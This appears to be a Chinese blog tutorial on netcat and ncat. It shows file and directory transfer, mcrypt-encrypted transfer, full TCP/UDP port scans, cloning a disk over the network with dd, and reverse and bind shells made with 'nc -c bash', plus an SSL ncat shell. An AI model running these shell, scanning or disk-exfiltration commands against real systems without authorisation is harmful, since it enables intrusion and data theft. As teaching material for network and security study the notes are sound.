NC与NCat

53次阅读

共计 966 个字符,预计需要花费 3 分钟才能阅读完成。

NC

NC 的一些功能:

侦听模式 / 传输模式
telnet / 获取 banner 信息
传输文本信息
传输文件 / 目录
加密传输文文件
远程控制 / 木马
加密所有流量
流媒体服务器
远程克隆硬盘

  • 传输文件

    A: nc -lp 333 > 1.mp4
    B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1

    A: nc - q 1 -lp 333 < a.mp4
    B: nc -nv 1.1.1.1 333 > 2.mp4

  • 传输目录

    A:tar -cvf - music/ | nc -lp 333 —q 1
    B:nc-nv 1.1.1.1 333 | tar -xvf-

  • 加密传输文件
    命令用到的参数有,–flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密

    A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    B : mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333-q 1

  • 扫描端口

    nc -nvz 1.1.1.1 1-65535

    所有端口全扫一遍,默认探测 TCP 端口
    nc -nvzu 1.1.1.1 1-65535
    所有端口全扫一遍,默认探测 UDP 端口,1-65535 表示扫面端口的范围

  • 远程克隆硬盘

    A:nc -lp 333 | dd of=/dev/sda
    B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

  • 远程控制

         方法一:在服务器端:nc -lp 333(打开的端口)
                         在客户端:nc -nv(服务器 IP)333 -c bash
                         将客户端的 bash 传给了服务器
          方法二:在服务器端:nc -lp 333(打开的端口)-c bash
                          在客户端:nc -nv(服务器 IP)333   
     将服务器端的 bash 传给了客户端
    

NCat

功能:用来弥补 NC 缺乏加密、身份验证的能力
服务器端侦听 333 端口:
Ncat -c bash –allow 192.168.1.119(IP) -nvl 333 –ssl
(身份验证)允许此 IP 来连接我                   使用 ssl 来加密
客户端:

Ncat -nv 192.168.1.115 333 --ssl

正文完
 0